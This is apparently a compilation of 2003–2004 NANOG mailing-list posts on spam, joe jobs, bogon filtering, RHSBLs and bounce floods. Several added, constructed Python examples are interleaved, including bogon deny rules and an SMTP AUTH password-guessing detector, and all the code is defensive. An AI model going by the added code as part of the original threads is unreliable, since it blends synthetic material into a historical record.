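and all addresses are constructed; pass a function that does a live A lookup
(e.g. wrapping socket.gethostbyname) to use it for real."""
import random
import string
from typing import Callable, Optional, Set

Resolver = Callable[[str], Optional[str]]   # name -> A record, or None for NXDOMAIN


def random_label(n: int = 20) -> str:
    """A label nobody registered; a healthy zone answers NXDOMAIN for it."""
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))


def detect_wildcard(resolve: Resolver, zone: str, probes: int = 3) -> Optional[str]:
    """Resolve several random names under `zone`. A healthy zone returns
    NXDOMAIN for all of them; a wildcarded zone answers every one with the
    same address, which is returned so callers can filter it."""
    answers = {resolve(f"{random_label()}.{zone}") for _ in range(probes)}
    if None in answers or len(answers) != 1:
        return None      # at least one NXDOMAIN, or the answers disagree
    return answers.pop()


def resolve_strict(resolve: Resolver, name: str, wildcard_addrs: Set[str]) -> Optional[str]:
    """Resolve `name`, but report the wildcard address as NXDOMAIN. A typo'd
    hostname then fails the way non-web software expects, while registered
    names still resolve normally."""
    addr = resolve(name)
    return None if addr in wildcard_addrs else addr


# Constructed stubs. Nothing here is live; .example stands in for a TLD.
KNOWN = {"www.real.example": "198.51.100.10", "mail.real.example": "198.51.100.25"}
WILDCARD_ADDR = "192.0.2.99"


def stub_healthy(name: str) -> Optional[str]:
    """Only registered names exist."""
    return KNOWN.get(name)


def stub_wildcarded(name: str) -> Optional[str]:
    """Registered names answer normally; every other name under .example
    resolves to the wildcard box, so NXDOMAIN never comes back."""
    if name in KNOWN:
        return KNOWN[name]
    return WILDCARD_ADDR if name.endswith(".example") else None


if __name__ == "__main__":
    for label, stub in (("healthy", stub_healthy), ("wildcarded", stub_wildcarded)):
        wc = detect_wildcard(stub, "example")
        filt = {wc} if wc else set()
        print(f"{label}: wildcard={wc!r}, typo.example -> "
              f"{resolve_strict(stub, 'typo.example', filt)!r}, "
              f"www.real.example -> {resolve_strict(stub, 'www.real.example', filt)!r}")
```

Filtering on the wildcard's address is the fragile part: change the address at the registry and the filter silently stops working, which is why the more robust fix at the time was BIND's delegation-only zone option, which refuses anything from the TLD servers that is not a delegation rather than matching a particular answer.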
Re: Unbelievable Spam.
On Monday, February 02, 2004 4:01 PM [GMT-5=EST], Ejay Hire [EMAIL PROTECTED] wrote: It's just wrong in my opinion, and exacerbated by the fact that it was spammed to our abuse account. Their /24 just fell off of my piece of the internet. Have I just been blind to this all along, or are the spammers getting bolder? It's called a joe job - spammers do it when they get spanked by an antispammer or someone else they don't like. Usually happens right after their service gets shut off, but they could do it for dozens of reasons. Hipcrime (aka dippy) loves doing this, and less than two months ago he went on a joe job spree spamming my home phone number and a dozen other people's. They are bold, and don't seem to fear anyone. You can keep killing them, and they don't learn. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: AOL web troubles.. New AOL speedup seems to be a slowdown
snipped since it's kinda long Just got done working with my mother's machine again, and have been watching her and a bunch of other people who use AOL 9.0 and some who use 8.0. Something over the past week alone has definitely happened in regards to the AOL TopSpeed stuff. I've got a situation with more than 75% of the people I've tested, that they have problems running Java applets (including AOL's own link into Pogo games) in AOL 9.0 GM (that they are distributing to end users). When the user switches to AOL 8.0, the problem exists. When the user uses IE separate from AOL, the problem does not exist. There are other issues developing as well - random freezing of Java games for example. Once again, this only happens in 9.0. This was working fine two weeks ago on all of these people's machines. Of course, this is increasing my daily workload, as I now have users having problems that I need to sit and try and diagnose. I've been telling people to use AOL 8.0 or IE if they want to play games. But, yes, there appears to be a problem somewhere with this TopSpeed stuff that people have been noting complaints about. Sorta off topic, but a lot of people here also do support for this kind of stuff, and would like to get some feedback as to what others are seeing with their end users. I have a sinking feeling that when I take the time to file an official bug report/issue, they will tell me 'reformat and reinstall'. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: AOL web troubles.. New AOL speedup seems to be a slowdown
On Thursday, January 29, 2004 7:14 PM [GMT-5=EST], Kevin Loch [EMAIL PROTECTED] wrote: Nicole wrote: In the past few days our AOL users have been reporting serious problems Several Brickshelf users have complained about the new blurry images problem using AOL. I have not heard any reports of broken images or upload problems yet. Kevin Loch This is more of their AOL TopSpeed stuff. Basically, the reason why end users are seeing the blurry images is because of the AOL ART format being used by their web proxies. Downloaded images via the built-in web browser are actually not in the same format as they were on the server. Basically, AOL's proxies download the image, recompress it as an ART image (killing a good portion of the quality in photos especially) and forward it to the built-in IE browser which knows how to render the ART images (even though the images themselves are still called .gif and .jpg and similar). Want to see an example of this? In older AOL versions (before 7 IIRC), load up a photo in the built-in IE browser in AOL with image compression on, right click and save the image to disk, then try to open it with a third party image program such as GIMP or PaintShop Pro and watch it moan about the format not being right. The sudden decrease in quality could be because they turned up the compression level. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: AOL web troubles.. New AOL speedup seems to be a slowdown
On Friday, January 30, 2004 12:34 AM [GMT-5=EST], Benjamin Chase [EMAIL PROTECTED] wrote: I am certainly not trying to make the point that anyone taking part in using web accelerators is violating a copyright by viewing content that is not necessarily in the original form, but I've been witness to a few discussions on several prominent (photo.net, etc) websites where the issue was being raised that the act of the parent company (in this case AOL) collecting images on their proxy and redistributing them to their users (in a new form, recompressed) pretty much negates any digital watermarking present in an image. Am I concerned about it personally? Not at all. Since I shoot primarily 35mm transparency film, I have a physical original of a piece of work, and if I needed to prove an image was really mine, then I would produce the physical copy. Properly implemented watermarking won't be affected by the recompression. It may not be as clear to the program as it would be if it was in its old format, but it's still legible. Since I'm a photographer, I've tested this theory a bit because of concerns that my black and white photos (which I actually sell for money) might be stolen off of our gallery site. You'd have to badly degrade the quality in order to completely destroy the watermarks, as long as you implemented the watermarking correctly in the first place. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: example.com/net/org DNS records
I'd say the problem of 1918 leakage is a bigger concern. Quite a big problem. Because some of the major backbones don't bother to filter that address space in the src of the packets, DDoS tools just love forging UDP packets with reserved space, which makes it nearly impossible to correctly track down where it's coming from. A good example of this issue is with at least two of the AHBL nameservers run by the SOSDG (I have no idea what the other nameservers are seeing as they are not managed by us, but they are probably getting similar queries), someone from 192.168.1.20 is making DNS queries for ip4r lookups under dnsbl.ahbl.org. Of course, the bogon filters stop it dead in its tracks, but, the fact that it's getting through across Sprint, Cogentco, and similar isn't a good sign. Providers should be filtering at their borders both src and dst packets going to any of the reserved spaces. If they did, this wouldn't be an issue. Now, the better question is, what idiot is doing those dnsbl queries on our servers, and why haven't they noticed that the lookups don't work, and resolving in general probably isn't working? Who knows. Side note: sorry about the weird quoting. OE-Quotefix is somehow barfing on your message specifically and crashing, so I had to turn it off. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: [EMAIL PROTECTED] To: Roger Marquis [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Sunday, January 04, 2004 3:05 PM Subject: Re: example.com/net/org DNS records
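The check the post above describes (queries arriving from 192.168.1.20 that a bogon filter should have stopped at some provider's border), as an added example that is not code from the original post or from the AHBL: it classifies the source addresses in a nameserver query log against RFC 1918 and other reserved space, and renders the src/dst border rules the post says providers should be running. The log lines, the BIND-style log format and the iptables rule shape are assumptions made for the example; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges standing in for ordinary public addresses.

```python
"""Added example, not code from the original post or from the AHBL: classify
the source addresses in a nameserver query log against RFC 1918 and other
reserved space, the check a border ACL (or a nameserver's bogon filter) applies.
The log lines, address ranges and rule shapes below are constructed."""
import ipaddress
import re
from collections import Counter

# Address space that must never appear as a source on the public Internet:
# RFC 1918 private ranges plus "this network", loopback, link-local,
# multicast and class E.
BOGON_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]

def is_bogon(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in BOGON_NETS)

# Constructed BIND-style query log. 198.51.100.0/24 and 203.0.113.0/24 are
# documentation ranges standing in for ordinary public addresses.
SAMPLE_LOG = """\
04-Jan-2004 15:01:02 client 192.168.1.20#3131: query: 4.3.2.1.dnsbl.ahbl.org IN A
04-Jan-2004 15:01:02 client 198.51.100.7#53: query: 8.7.6.5.dnsbl.ahbl.org IN A
04-Jan-2004 15:01:03 client 192.168.1.20#3131: query: 9.8.7.6.dnsbl.ahbl.org IN A
04-Jan-2004 15:01:05 client 10.0.0.9#1024: query: example.com IN MX
04-Jan-2004 15:01:06 client 203.0.113.44#53: query: 12.11.10.9.dnsbl.ahbl.org IN A
"""

QUERY_RE = re.compile(r"client (\d+\.\d+\.\d+\.\d+)#\d+: query: (\S+) IN (\S+)")

def parse_query_line(line: str):
    """Return (client_ip, qname, qtype), or None for lines that do not match."""
    m = QUERY_RE.search(line)
    return m.groups() if m else None

def audit_queries(log_text: str) -> dict:
    """Count queries per reserved-space source; 'clean' counts the rest.
    A query from a bogon source is unanswerable (the reply has nowhere to go),
    and its presence proves some upstream is not filtering sources at its border."""
    bogon, clean = Counter(), 0
    for line in log_text.splitlines():
        parsed = parse_query_line(line)
        if parsed is None:
            continue
        src, _qname, _qtype = parsed
        if is_bogon(src):
            bogon[src] += 1
        else:
            clean += 1
    return {"bogon": bogon, "clean": clean}

def border_filter_rules(ifname: str = "eth0") -> list:
    """Rules for a provider's border interface: drop packets whose source OR
    destination falls in reserved space (iptables syntax assumed for the example)."""
    rules = []
    for net in BOGON_NETS:
        rules.append(f"iptables -A FORWARD -i {ifname} -s {net} -j DROP")
        rules.append(f"iptables -A FORWARD -i {ifname} -d {net} -j DROP")
    return rules

if __name__ == "__main__":
    report = audit_queries(SAMPLE_LOG)
    for src, n in report["bogon"].most_common():
        print(f"{src}: {n} queries from reserved space")
    print("\n".join(border_filter_rules()))
```

Run against the constructed log it reports two queries from 192.168.1.20 and one from 10.0.0.9, which is the signal the post describes: the nameserver can drop them, but the fact that they arrived at all is the finding worth taking to the upstream.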
Re: example.com/net/org DNS records
On Sunday, January 04, 2004 4:43 PM [GMT-5=EST], Roger Marquis [EMAIL PROTECTED] wrote: If UCE happens to contain a forged sender of roble.com, would you consider that even remotely useful in a filter? Yes. Roble manages several email gateways for companies other than ourselves and we've found that rejecting invalid domains and senders is an indispensable component of spam filtering. Not only is it effective it is also 100% false-positive proof (so far). But, it has to be done carefully. Our RHSBL (part of the AHBL) is based on this idea - but, we are extremely careful in what we block exactly. A single wrong block (aol.com for example) could have really bad side effects for anyone using the list. As such, the best way to use a domain style block is to try and only use it on the mainsleaze spammers for example, that spam from their (many) domains they own. We had to do this with Topica's spammy domains in order to allow our users to keep getting messages from mailing lists hosted off of Topica's main domain. Each type of blacklisting has to be carefully thought out, and implemented correctly. A combination of a DNSbl, a RHSbl, a whitelist, and something similar to SpamAssassin gives you the flexibility to block a lot of spam without needing to block everything outright. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
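The combination the post above argues for (an IP-based DNSBL, a domain-based RHSBL, and a whitelist that keeps one subdomain deliverable while a sibling stays listed), as an added example that is not the AHBL's code: ip4r names are built by reversing the octets under the list zone, RHSBL lookups walk from the sender domain up to its parents, and the whitelist exempts a domain from the RHSBL only. The zone names, the listing data, the whitelist entries and the weights are constructed; a real deployment replaces lookup() with a DNS A query where an answer in 127.0.0.0/8 means listed and NXDOMAIN means not.

```python
"""Added example, not the AHBL's code: combine an IP-based DNSBL (ip4r lookup),
a domain-based RHSBL and a whitelist into one scoring decision. Zone names,
listing data, whitelist and weights are constructed for the example."""
from typing import Optional

DNSBL_ZONE = "dnsbl.example"   # assumed zone names
RHSBL_ZONE = "rhsbl.example"

# Stand-in for the DNS answers (constructed). In production, lookup() does an
# A query and returns None on NXDOMAIN.
LISTING = {
    "44.113.0.203.dnsbl.example": "127.0.0.2",          # a listed open proxy
    "spamhost.example.rhsbl.example": "127.0.0.2",       # whole domain listed
    "bulk.mailhost.example.rhsbl.example": "127.0.0.2",  # one subdomain listed,
}                                                        # mailhost.example is not

# Exempt from the RHSBL, together with their subdomains: the case in the post,
# keep the mailing-list host deliverable while the spammy sibling stays listed.
RHSBL_WHITELIST = {"lists.mailhost.example"}

WEIGHTS = {"dnsbl": 5, "rhsbl": 3}
REJECT_AT, TAG_AT = 5, 3

def lookup(name: str) -> Optional[str]:
    return LISTING.get(name)

def ip4r_name(addr: str, zone: str) -> str:
    """1.2.3.4 under zone -> 4.3.2.1.zone"""
    return ".".join(reversed(addr.split("."))) + "." + zone

def parent_domains(domain: str):
    """Yield the domain and each parent down to the registrable level (2 labels)."""
    labels = domain.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        yield ".".join(labels[i:])

def rhsbl_listed(domain: str) -> Optional[str]:
    """Return the listed name that matched (exact or a parent), or None."""
    for cand in parent_domains(domain):
        if lookup(f"{cand}.{RHSBL_ZONE}") is not None:
            return cand
    return None

def whitelisted(domain: str) -> bool:
    return any(cand in RHSBL_WHITELIST for cand in parent_domains(domain))

def score_message(client_ip: str, sender_domain: str):
    """Return (decision, score, reasons). The whitelist exempts a domain from
    the RHSBL only: a listed connecting IP still counts, because sender domains
    are forged freely and a whitelist that overrode IP evidence would be useless."""
    score, reasons = 0, []
    if lookup(ip4r_name(client_ip, DNSBL_ZONE)) is not None:
        score += WEIGHTS["dnsbl"]
        reasons.append(f"{client_ip} listed in {DNSBL_ZONE}")
    if whitelisted(sender_domain):
        reasons.append(f"{sender_domain} whitelisted for {RHSBL_ZONE}")
    else:
        hit = rhsbl_listed(sender_domain)
        if hit:
            score += WEIGHTS["rhsbl"]
            reasons.append(f"{hit} listed in {RHSBL_ZONE}")
    if score >= REJECT_AT:
        decision = "reject"
    elif score >= TAG_AT:
        decision = "tag"
    else:
        decision = "accept"
    return decision, score, reasons

if __name__ == "__main__":
    for ip, dom in [("203.0.113.44", "clean.example"),
                    ("198.51.100.7", "newsletter.bulk.mailhost.example"),
                    ("198.51.100.7", "lists.mailhost.example")]:
        print(ip, dom, "->", score_message(ip, dom))
```

With these weights a DNSBL hit alone rejects and an RHSBL hit alone only tags, which is the "flexibility" the post asks for: the domain list is the one with the aol.com-sized blast radius, so it gets the smaller weight and a whitelist, and the exact listing (bulk.mailhost.example, not mailhost.example) is what keeps the list's own users' mailing-list traffic flowing.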
Re: Automated Network Abuse Reporting
On Monday, December 29, 2003 11:24 AM [GMT-5=EST], Joel Jaeggli [EMAIL PROTECTED] wrote: if you automate abuse reporting you can basically assume that the receiver will automate abuse handling. since that has in fact happened as far as i can tell the probability of your automated abuse replies ever reaching a human who cares or can do something about it is effectively zero. Most likely, automated abuse reports will be treated like abuse reports from users with those lovely software firewalls that whine all the time that their ISP's nameserver is trying to hack them on port 53 (i.e. thrown in with the rest of the reports in the round filing cabinet on the floor next to the desk). I refused to accept automated abuse reports of probes or similar when I was an ISP netadmin. Portscans/pingscans/etc are not illegal (and I've seen this successfully proven in court at least once). They are illegal if you use it to bring down someone's machine though. Basically, if I were you, I'd turn your firewall's sensitivity WAY down and only track events that are obviously attempts to hack. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: a note to those who would automate their rejection notices
On Saturday, December 27, 2003 3:23 PM [GMT-5=EST], Paul Vixie [EMAIL PROTECTED] wrote: Anyway, I hope folks will stop sending automated rejection notices to domains who were not involved, other than by forgery, in the transmission of a virus or spam. In other words, there's relevant operational content in this thread, and when fighting spam it would be reasonable to avoid hurting uninvolved third parties. AOL, please listen. Cox in particular was doing this until recently (we got their attention rather quickly after blacklisting their main mail servers). We were being joe jobbed badly, and Cox's mail servers were generating massive amounts of bounces per minute, and out of all the bounces, Cox was generating the most (at least 3/4 of them). The result was that each one of their mail servers (more than a dozen) was sending one bounce per connection, and launching anywhere between 5-12 connections at a time, then reconnecting right away after sending the single bounce and disconnecting. We quickly ran out of connection slots on both the primary and secondary mail spoolers, leaving us unable to get incoming mail until we firewalled out Cox's mail servers. One would think, if you're going to run a cluster of mail servers to handle your mail, that you would rate limit your bounces so that people (like myself) who can't afford to have a dozen or more heavy duty mail servers don't end up getting DoS'd by your mail server's ability to pump out millions of messages per hour. Someone said on one of the newsgroups, Well, maybe they setup their system correctly, and don't see a need to change something that works. The problem is, there's a difference between properly configuring a mail server and responsibly configuring a mail server. When you responsibly configure a mail server, you take into account OTHER people's systems and how THEY will be able to deal with your server.
Part of the issue comes with when you accept a mail, then bounce afterwards, instead of just bouncing after RCPT TO: or DATA. When you delay the bounce, you will generate a bounce to the From: address, even if it is forged. When you outright reject the message, you pretty much reduce the risk of that happening by far, as the sending server will see that the message was rejected, and hopefully move on. Now, this works with open proxies, but not with open relays. Do spammers use open relays much anymore? No, not really. Why leave a trail back to yourself when you can hide completely? AOL has _not_ done this to us though, we've seen maybe one or two bounces from AOL's servers, but nothing even remotely close to what Cox is doing. Just my thoughts, flame away :) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
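The two behaviours the post above contrasts, as an added example that is not code from the original post or from any of the MTAs named in the thread: the same joe-job delivery is run through a minimal receive-side SMTP state machine once with rejection at RCPT TO (nothing is queued, so nothing can be bounced to the forged sender) and once with accept-then-bounce (a DSN is generated to whatever MAIL FROM claimed), followed by the per-destination bounce rate limiter the post says a mail cluster should have. The session, mailbox list, host names and the window size are constructed for the example.

```python
"""Added example, not code from the original post or from any MTA named in
the thread: a receive-side SMTP state machine run two ways over the same
joe-job delivery, plus a per-domain bounce rate limiter. The session,
mailbox list and host names are constructed."""
import re
from collections import deque

ADDR_RE = re.compile(r"<([^>]*)>")

def _addr(arg: str) -> str:
    m = ADDR_RE.search(arg)
    return m.group(1) if m else ""

def handle_session(commands, local_users, reject_at_rcpt=True):
    """Process one SMTP session. Returns (responses, bounces), where bounces are
    the DSNs this server would later have to send to the MAIL FROM address.
    reject_at_rcpt=True refuses unknown recipients with a 550 during the
    transaction; False accepts everything and discovers the problem after DATA,
    which is exactly what turns a forged sender into a bounce target."""
    responses, bounces, body = [], [], []
    sender, rcpts, in_data = "", [], False
    responses.append("220 mx.isp.example ESMTP")
    for cmd in commands:
        if in_data:
            if cmd != ".":
                body.append(cmd)
                continue
            in_data = False
            unknown = [r for r in rcpts if r not in local_users]
            if unknown and sender:
                # Late rejection: the message is already ours, so the only way
                # to report the failure is a bounce to whatever MAIL FROM said.
                bounces.append({"to": sender, "undeliverable": unknown})
            responses.append("250 2.0.0 queued")
            continue
        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            responses.append("250 mx.isp.example")
        elif verb == "MAIL":
            sender = _addr(arg)
            responses.append("250 2.1.0 sender ok")
        elif verb == "RCPT":
            rcpt = _addr(arg)
            if reject_at_rcpt and rcpt not in local_users:
                # Early rejection: the sending side owns the failure; nothing
                # is queued, so nothing can be bounced to a forged address.
                responses.append("550 5.1.1 no such user")
            else:
                rcpts.append(rcpt)
                responses.append("250 2.1.5 recipient ok")
        elif verb == "DATA":
            if rcpts:
                in_data = True
                responses.append("354 end data with <CRLF>.<CRLF>")
            else:
                responses.append("554 5.5.1 no valid recipients")
        elif verb == "QUIT":
            responses.append("221 bye")
        # Anything else (including message lines a client sends after a 554)
        # is ignored here; a real MTA answers 500/503.
    return responses, bounces

class BounceRateLimiter:
    """Sliding-window cap on bounces per destination domain. A limited bounce
    is deferred in the local queue, not dropped, so a dozen-server cluster
    cannot turn someone else's joe job into a connection-slot DoS."""
    def __init__(self, max_per_window: int, window_seconds: float):
        self.max, self.window = max_per_window, window_seconds
        self._sent = {}

    def allow(self, dest_domain: str, now: float) -> bool:
        q = self._sent.setdefault(dest_domain, deque())
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.max:
            return False
        q.append(now)
        return True

LOCAL_USERS = {"someone@isp.example"}   # constructed mailbox list

# A joe-job delivery as the receiving MTA sees it (constructed): the envelope
# sender is forged to the victim and the recipient does not exist.
JOE_JOB_SESSION = [
    "HELO openproxy.example",
    "MAIL FROM:<victim@ahbl.example>",
    "RCPT TO:<nosuchuser@isp.example>",
    "DATA",
    "Subject: buy now", "", "spam body", ".",
    "QUIT",
]

if __name__ == "__main__":
    for early in (True, False):
        resp, dsns = handle_session(JOE_JOB_SESSION, LOCAL_USERS, reject_at_rcpt=early)
        print("reject at RCPT" if early else "accept then bounce", "->", len(dsns), "bounce(s)")
```

The open-proxy caveat in the post holds here too: with early rejection the 550 goes back to the proxy, which the spammer never looks at, and the victim never hears about it; with an open relay the relay has already accepted the message and will itself bounce it, so the fix has to be applied on the relay, not the final MX.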
Re: Happy Holiday Wishes
Merry Christmas and happy holidays! Let's hope the coming year is good for everyone (except the spammers that is :-) Off I go to help my mother learn how to use the new digital camera I gave her for Christmas! -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: Henry Linneweh To: Braun, Mike ; NANOG Sent: Thursday, December 25, 2003 5:46 AM Subject: Re: Happy Holiday Wishes Merry Christmas All and Happy New Year -Henry "Braun, Mike" [EMAIL PROTECTED] wrote: To all on Nanog, Have a happy holiday season and a great new year :-) Mike Braun
RoadRunner contact
Hello all, I don't suppose anyone here might have a direct contact for the people at Road Runner in regards to DNS management and/or their abuse desk? Contact me off-list please. Thanks. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: SPAM from own customers
- Original Message - From: Suresh Ramasubramanian [EMAIL PROTECTED] To: Michel Renfer [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Tuesday, December 02, 2003 2:23 PM Subject: Re: SPAM from own customers Virus filtering Rate limit (+ script to auto terminate user) and smtp auth on outbounds SMTP AUTH is becoming risky if it's not carefully setup and monitored. I can name one big time spammer who has warmed up to cracking weak passwords on e-mail systems that do SMTP AUTH. Means you'd have to filter your outbound mail servers' port 25 from anyone not inside your network or a trusted source. Virus filtering is a must, but, alas, not all mail servers filter *outgoing* mail. Most filter only incoming mail. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
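The two halves of the post above (spotting password guessing against SMTP AUTH, and only letting your own network reach the relay in the first place), as an added example that is not code from the original post or from any MTA: a sliding-window detector over an authentication log that flags a source for too many failures or for cycling through distinct usernames, and a relay policy in which a source outside the trusted networks is refused even when it authenticates. The log format, the thresholds, the addresses and the trusted ranges are constructed for the example; a real MTA's log lines look different and the regex would need adjusting.

```python
"""Added example, not code from the original post or from any MTA: detect
SMTP AUTH password guessing in an authentication log, and apply the
'only relay for your own network' rule. Log format, thresholds and address
ranges are constructed for the example."""
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+ \S+) auth (failed|ok) for user=(\S+) from=(\S+)$")

# Constructed log: one source cycles through accounts, one user mistypes once.
SAMPLE_LOG = """\
2003-12-02 14:23:01 auth failed for user=bob from=203.0.113.9
2003-12-02 14:23:04 auth failed for user=alice from=203.0.113.9
2003-12-02 14:23:07 auth failed for user=carol from=203.0.113.9
2003-12-02 14:23:09 auth failed for user=dave from=203.0.113.9
2003-12-02 14:23:12 auth failed for user=bob from=203.0.113.9
2003-12-02 14:23:15 auth failed for user=alice from=203.0.113.9
2003-12-02 14:30:00 auth failed for user=erin from=198.51.100.7
2003-12-02 14:30:20 auth ok for user=erin from=198.51.100.7
2003-12-02 16:00:00 auth failed for user=frank from=203.0.113.9
"""

def parse_auth_log(log_text):
    """Yield (timestamp, result, user, source_ip) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
                   m.group(2), m.group(3), m.group(4))

def find_auth_bruteforce(log_text, max_failures=5, max_users=3,
                         window=timedelta(minutes=10)):
    """Return {source_ip: reason} for sources that, within a sliding window,
    either fail too often or try too many distinct usernames (the second rule
    catches slower guessing that walks an account list)."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, username)
    flagged = {}
    for ts, result, user, ip in parse_auth_log(log_text):
        if result != "failed":
            continue
        q = recent[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()
        users = {u for _, u in q}
        if len(q) >= max_failures:
            flagged[ip] = f"{len(q)} failures within {window}"
        elif len(users) >= max_users:
            flagged[ip] = f"{len(users)} distinct usernames within {window}"
    return flagged

# Only hosts on your own network (or explicitly trusted ones) may even reach
# the relay; SMTP AUTH is then a second gate, not the only one. Constructed.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "198.51.100.0/24")]

def may_relay(src_ip: str, authenticated: bool) -> bool:
    inside = any(ipaddress.ip_address(src_ip) in net for net in TRUSTED_NETS)
    return inside and authenticated

if __name__ == "__main__":
    for ip, why in find_auth_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {why}; relay allowed even if auth succeeds? {may_relay(ip, True)}")
```

The point of the second function is the one the post makes: with the port filtered to your own network, a cracked password is useful to the spammer only from inside it, which is a much smaller and much more visible place to be.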
Re: Anit-Virus help for all of us??????
- Original Message - From: Vivien M. [EMAIL PROTECTED] To: 'Daniel Karrenberg' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Tuesday, November 25, 2003 9:39 AM Subject: RE: Anit-Virus help for all of us?? Have either of you actually followed this advice? Win98SE is totally useless as a desktop OS due to the archaic GDI/USER resource limits. When one average consumerish app (eg: a media player) eats up 10% of those resources, one window in an IM program eats up 2%, etc... it does not take much to bring down an entire system. Last time I was running Win98SE (which is about 3 years ago), it took about 20 minutes after booting while running boring normal apps to get to a dangerously low resource level (30%ish free). That machine got totally unstable needing a reboot after about 3 days. On the same hardware (with additional RAM), Win2K could easily run 3-4 weeks and run any app I wanted just fine. So, some people might say I'm a power user, but the average users I know these days tend to multitask at least a web browser, an IM client with a couple open windows, some bloated media player, perhaps a P2P app, and some office app. This is already stretching Win9X to its limits, and I would expect it to be worse (code just gets sloppier...) than it was three years ago... Yes I do follow my own advice. Back from the days when I was an OEM, I still have a box full of Win98SE CD packs/licenses for when I build people new machines. It's what I put on them standard unless you ask for Win2k or XP or NT4 (or any other OS for that matter, i.e. Linux, BSD). I know full well about the resource limits. It's a PITA, but as long as you run a decent set of apps that don't suffer from resource leaks (Mozilla without a GDI patch does this for example) that eventually use up all GDI/USER memory, you'll be fine.
I use Win98SE here all day with only one reboot needed most days, and I run WinAMP, PuTTY, K-Meleon, Outlook Express, Cygwin, mIRC, Xnews (which has a bad habit of crashing the whole system at times), as well as AIM, Miranda IM, SST, Yahoo Messenger, and various other tools. That's all at once, multitasking. I know, I could reduce the clutter by letting Miranda IM do AIM and Yahoo, but that's not the point. :-) Many times, resource suckage comes from those ugly faceless background programs that run at startup. Kill as many icons as you can on the desktop and the task bar, and clean out your startup list, and you'll free up a lot of GDI resources. No wonder people think Windows is unreliable. 98SE may be preferable from a security-from-external-threats POV, yes, but for any type of real use, it's useless. Not to mention the other quirks, like needing to reboot to change network settings, the lack of any local security (or even attempt at local security), etc. I'll take rebooting every week or two for the latest XP security patch any day over rebooting every day or two because Win98SE is an unreliable piece of poorly designed legacy junk. The way I see it, there are two uses for 98SE (or 95, 98, Me, etc) in the modern world: 1) People who use their computers as game-only machines (or who dual boot a real OS for non-game purposes) 2) Advertising for $OTHER_OS, where $OTHER_OS can be Win2K, XP, or your favourite Linux distro with KDE, GNOME, etc. Anything that actually WORKS reliably. Let's not forget those people who just don't have the CPU power or memory to support 2k or XP. Just because something is new and 'improved' doesn't make it better. Yes, 9x has a lot of legacy crap. Yes, 9x has various issues with resource usage. But sometimes, it's just right. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Anit-Virus help for all of us??????
now) with all the important options turned on, has the option of downloading a list of latest patches from our web server, and then downloads them from Microsoft (regardless of whether it was installed already, as I have found that sometimes Windows Update thinks a patch is installed, when it's really not), then quietly installs them without user interaction, then forces the user to reboot. It's got some 'issues' in its current implementation, so I'm not comfortable with releasing it into the wild for people yet. That and the fact it only works on XP. It isn't *that* hard to put something together for your less clueful customers, as long as they agree to some sort of release of liability before running it. Not always possible, but who knows. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: RBLs in use
